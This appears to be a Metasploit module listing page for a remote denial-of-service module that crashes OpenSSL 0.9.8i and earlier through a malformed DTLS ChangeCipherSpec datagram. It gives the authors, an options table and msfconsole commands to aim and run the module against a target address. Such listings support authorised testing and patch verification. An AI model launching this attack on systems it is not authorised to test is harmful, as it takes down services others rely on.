Browse Exploit & Auxiliary Modules
The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.
Search for modules
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS
This module performs a Denial of Service Attack against Datagram TLS in OpenSSL version 0.9.8i and earlier. OpenSSL crashes under these versions when it recieves a ChangeCipherspec Datagram before a ClientHello.
Rank
- Normal
Authors
- Jon Oberheide < jon [at] oberheide.org >
- TheLightCosine < thelightcosine [at] gmail.com >
References
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/ssl/dtls_changecipherspec
msf auxiliary(dtls_changecipherspec) > set RHOST [TARGET IP]
msf auxiliary(dtls_changecipherspec) > set RPORT [TARGET PORT]
msf auxiliary(dtls_changecipherspec) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/ssl/dtls_changecipherspec
msf auxiliary(dtls_changecipherspec) > set RHOST [TARGET IP]
msf auxiliary(dtls_changecipherspec) > set RPORT [TARGET PORT]
msf auxiliary(dtls_changecipherspec) > run
Module Options
| RHOST | The target address |
| RPORT | The target port |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |